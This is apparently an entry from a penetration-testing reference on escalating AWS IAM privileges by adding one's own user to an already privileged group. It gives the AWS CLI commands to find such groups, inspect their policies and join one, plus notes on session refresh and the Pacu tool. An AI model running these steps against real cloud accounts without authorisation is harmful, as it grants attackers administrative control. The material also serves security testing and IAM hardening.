A user inherits every policy attached to the groups it belongs to. iam:AddUserToGroup lets you add your user to any group, so joining a more privileged group (an admins group, or one with a broad attached policy) promotes you in a single call.
Join a privileged group#
aws iam list-groups # find a group with strong policies
aws iam list-attached-group-policies --group-name <group>
aws iam add-user-to-group --group-name <group> --user-name <you>
Exploitation notes#
- The inherited permissions apply immediately to new sessions; refresh credentials if a cached session predates the change.
- This differs from AttachGroupPolicy: here the group is already privileged and you simply join it.
Tools#
- AWS CLI (
iam add-user-to-group). - Pacu (
iam__privesc_scan).